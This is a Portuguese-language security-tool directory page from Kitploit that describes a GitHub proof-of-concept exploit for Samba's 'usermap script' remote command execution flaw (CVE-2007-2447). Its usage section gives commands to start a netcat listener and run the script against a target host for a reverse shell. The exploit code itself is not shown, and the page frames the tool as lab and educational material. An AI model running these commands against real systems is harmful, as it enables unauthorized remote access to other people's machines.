Skip to content
KitploitKITPLOIT
FerramentasBlog
Enviar
FerramentasBlog
Enviar

Ferramentas de Hacking, PenTest e Cibersegurança para o seu Arsenal de Segurança!

Kitploit é um diretório de ferramentas de hacking, cibersegurança e pentesting. Descubra as últimas atualizações de projetos para encontrar vulnerabilidades, analisar sistemas, automatizar testes e fortalecer sua segurança.

··Feeds·Contato·Privacidade·© 2026 Kitploit

Diretório de Ferramentas

Categorias

Ver todas as categorias
Loading categories
CVE-2007-2447 — Exploit de prova de conceito para execução remota de comandos do script usermap do Samba (CVE-2007-2447) com entrega de payload de shell reversa para testes educacionais em laboratório. | Kitploit
Ferramentas/GitHubGitHub/abdulsaabir/cve-2007-2447
Geração de PayloadsAnálise de VulnerabilidadesExploraçãoTestes de PenetraçãoComando e ControleAprendizado e EducaçãoFerramenta de Acesso Remoto
GitHubabdulsaabir/cve-2007-2447

CVE-2007-2447

Exploit de prova de conceito para execução remota de comandos do script usermap do Samba (CVE-2007-2447) com entrega de payload de shell reversa para testes educacionais em laboratório.

Ver Repositório
1há 7 mesesAinda não revisado

Mais Populares

Ver todos →

Descubra as ferramentas mais usadas pela nossa comunidade.

Explore todas as ferramentas

Navegue pela nossa coleção de ferramentas

Ver todas as ferramentas →
Compartilhar

CVE-2007-2447

PoC: Samba "usermap script" execução remota de comandos (CVE histórico). Este repositório contém um pequeno script de prova de conceito para pesquisa e revisão educacional. O script principal é usermap_script_Command_Execution.py.

Artigo de referência: https://amriunix.com/post/cve-2007-2447-samba-usermap-script/

Uso

Clone o repositório e execute o script em um laboratório controlado. O PoC usa opcionalmente um reverse shell para LHOST:LPORT — inicie seu listener antes de executar o script e garanta que as dependências estejam instaladas (consulte Instalação).

root@kitploit:~
git clone https://github.com/abdulsaabir/CVE-2007-2447.git
cd CVE-2007-2447
# ensure dependencies are installed (see Installation), then start a listener on your LHOST:LPORT
# example using netcat with a placeholder port:
nc -lnvp <LPORT>
# in another terminal, run the PoC against the lab target:
python3 usermap_script_Command_Execution.py <RHOST> 139 <LHOST> <LPORT>

Parâmetros

  • RHOST — IP ou hostname alvo
  • RPORT — porta TCP alvo (tipicamente 139)
  • LHOST — IP do listener para uma conexão reversa
  • LPORT — porta do listener

Instalação

Recomendado: crie um ambiente virtual Python isolado e instale as dependências do requirements.txt antes de executar o script.

root@kitploit:~
python3 -m venv exploit_env
source exploit_env/bin/activate
pip install -r requirements.txt

Segurança e Aviso Legal

Este código é fornecido apenas para pesquisa legítima de segurança, educação e testes defensivos. Não execute este script contra qualquer sistema que você não possua ou tenha permissão explícita por escrito para testar. O uso indevido pode levar a consequências legais; o proprietário do repositório não é responsável pelo uso indevido.

Sempre prefira revisão estática de código e testes em laboratório controlado (snapshots de VM, redes isoladas e capturas de pacotes) ao analisar código potencialmente perigoso.

Se você deseja um passo a passo anotado não executável ou um requirements.txt, abra uma issue ou solicite aqui.

Baixar ferramenta